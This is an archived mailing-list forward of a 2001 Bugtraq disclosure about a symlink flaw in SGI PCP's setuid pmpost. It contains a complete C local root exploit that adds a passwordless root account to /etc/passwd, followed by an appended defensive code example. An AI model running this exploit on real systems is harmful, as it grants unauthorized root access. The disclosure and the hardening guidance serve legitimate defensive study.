
PCP exploit: pmpost - another nice symlink follower

To: pcp@xxxxxxxxxxx
Subject: PCP exploit: pmpost - another nice symlink follower
From: Michal Kara <lemming@xxxxxxxxxxxxxxxxxxx>
Date: Tue, 19 Jun 2001 08:17:03 +0200
Sender: owner-pcp@xxxxxxxxxxx
  I guess this is of high importance for people on this list... If you don't
need pmpost setuid, just remove the suid bit and it'll be fine.

                                                        Michal


----- Forwarded message from Paul Starzetz <paul@xxxxxxxxxxx> -----

Return-Path: <bugtraq-return-483-lemming=arthur.plbohnice.cz@xxxxxxxxxxxxxxxxx>
Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
Date: Mon, 18 Jun 2001 19:11:20 +0200
From: Paul Starzetz <paul@xxxxxxxxxxx>
X-Accept-Language: en
To: "bugtraq@xxxxxxxxxxxxxxxxx" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: pmpost - another nice symlink follower

Hi,

there is a symlink handling problem in the pcp suite from SGI. The
binary pmpost will follow symlinks; if setuid root, this leads to instant
root compromise, as found on SuSE 7.1 (I doubt that this is a default SuSE
package, though).

Attached is a simple C source to demonstrate this (gcc pm.c -o pm then
./pm).

Ihq.

---------------------- pm.c ----------------------------

/********************************************************
*                                                       *
*               pmpost local root exploit               *
*               vulnerable: pcp <= 2.1.11-5             *
*               by IhaQueR                              *
*                                                       *
********************************************************/

#include <stdio.h>
#include <stdlib.h>      /* srand, rand, putenv, system */
#include <time.h>        /* time */
#include <unistd.h>      /* chdir, symlink, fork, execl, _exit */
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/stat.h>

int main(void)
{
        const char *bin = "/usr/share/pcp/bin/pmpost";
        static char buf[512];
        static char dir[128];

        /* private scratch directory under /tmp */
        srand(time(NULL));
        sprintf(dir, "/tmp/dupa.%.8d", rand());

        if (mkdir(dir, S_IRWXU))
                _exit(2);

        if (chdir(dir))
                _exit(3);

        /* NOTICES is the file pmpost writes to; here it is a symlink */
        if (symlink("/etc/passwd", "./NOTICES"))
                _exit(4);

        /* point the setuid pmpost at this directory via its env override */
        snprintf(buf, sizeof(buf) - 1, "PCP_LOG_DIR=%.500s", dir);

        if (putenv(buf))
                _exit(5);

        if (!fork()) {
                /* child: run pmpost; its message gets appended through the link */
                execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
                _exit(1);
        } else {
                /* parent: wait, clean up the scratch directory, switch user */
                waitpid(0, NULL, WUNTRACED);
                chdir("..");
                sprintf(buf, "rm -rf dupa.*");
                system(buf);
                execl("/bin/su", "/bin/su", "r00t", NULL);
        }
        return 0;
}

----- End forwarded message -----
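The post's remedy is to drop the suid bit. The programming-side remedy, shown here as an added example that is not part of the original post and is not PCP's own pmpost code, is for a privileged program to (a) ignore a PCP_LOG_DIR-style environment override when it runs setuid and (b) open its log file relative to a checked directory descriptor with O_NOFOLLOW, so a planted symlink such as NOTICES is refused with ELOOP instead of being written through. The function names, the default directory /var/log/pcp and the scratch paths used by the self-check are assumptions made for this illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 when the effective ids differ from the real ids (a setuid/setgid run). */
int running_setuid(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Pick the log directory.  The environment override (PCP_LOG_DIR on the page)
 * is honoured only for an unprivileged run and only if it is absolute; a
 * setuid run always uses the compiled-in default (assumed: /var/log/pcp). */
const char *choose_log_dir(const char *env_value, int is_setuid,
                           const char *default_dir)
{
    if (is_setuid || env_value == NULL || env_value[0] != '/')
        return default_dir;
    return env_value;
}

/* Open dir/name for appending without following a symlink in the final
 * component.  Returns an fd, or -1 with errno set:
 *   ELOOP - name is a symlink (rejected by O_NOFOLLOW)
 *   EPERM - dir is group/world writable without the sticky bit, or the
 *           object opened is not a regular file */
int open_log_nofollow(const char *dir, const char *name)
{
    struct stat st;
    int dfd, fd, saved;

    dfd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    if (fstat(dfd, &st) < 0) {
        saved = errno; close(dfd); errno = saved; return -1;
    }
    /* Anyone who can write the directory can plant a symlink in it. */
    if ((st.st_mode & (S_IWGRP | S_IWOTH)) && !(st.st_mode & S_ISVTX)) {
        close(dfd); errno = EPERM; return -1;
    }
    /* openat resolves name relative to the descriptor just checked, so the
     * directory cannot be swapped between the check and the open. */
    fd = openat(dfd, name,
                O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0644);
    saved = errno;
    close(dfd);
    if (fd < 0) {
        errno = saved;
        return -1;
    }
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode)) {
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}

/* Self-check in a scratch directory built here (constructed, not from the
 * post): a symlink named NOTICES must be refused with ELOOP and a plain file
 * must open.  Returns 1 on success, 0 on any failure. */
int demo_self_test(void)
{
    char tmpl[] = "/tmp/pcplogXXXXXX";
    char target[PATH_MAX], lnk[PATH_MAX], plain[PATH_MAX];
    int ok = 0, fd;

    if (mkdtemp(tmpl) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/target", tmpl);
    snprintf(lnk, sizeof lnk, "%s/NOTICES", tmpl);
    snprintf(plain, sizeof plain, "%s/plain.log", tmpl);

    fd = open(target, O_WRONLY | O_CREAT, 0600);
    if (fd < 0) goto out;
    close(fd);
    if (symlink(target, lnk) != 0) goto out;

    fd = open_log_nofollow(tmpl, "NOTICES");   /* must fail with ELOOP */
    if (fd != -1) { close(fd); goto out; }
    if (errno != ELOOP) goto out;
    fd = open_log_nofollow(tmpl, "plain.log"); /* must succeed */
    if (fd < 0) goto out;
    close(fd);
    ok = 1;
out:
    unlink(lnk); unlink(target); unlink(plain); rmdir(tmpl);
    return ok;
}

int main(void)
{
    printf("setuid context: %s\n", running_setuid() ? "yes" : "no");
    printf("self test: %s\n", demo_self_test() ? "PASS" : "FAIL");
    return 0;
}
```

The directory-writability check and the O_NOFOLLOW open are both needed: the first stops an untrusted party from placing a link in a shared log directory, the second stops a link that is already there from being followed, and doing the open through openat() on the directory descriptor that was just inspected removes the window between the check and the write.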
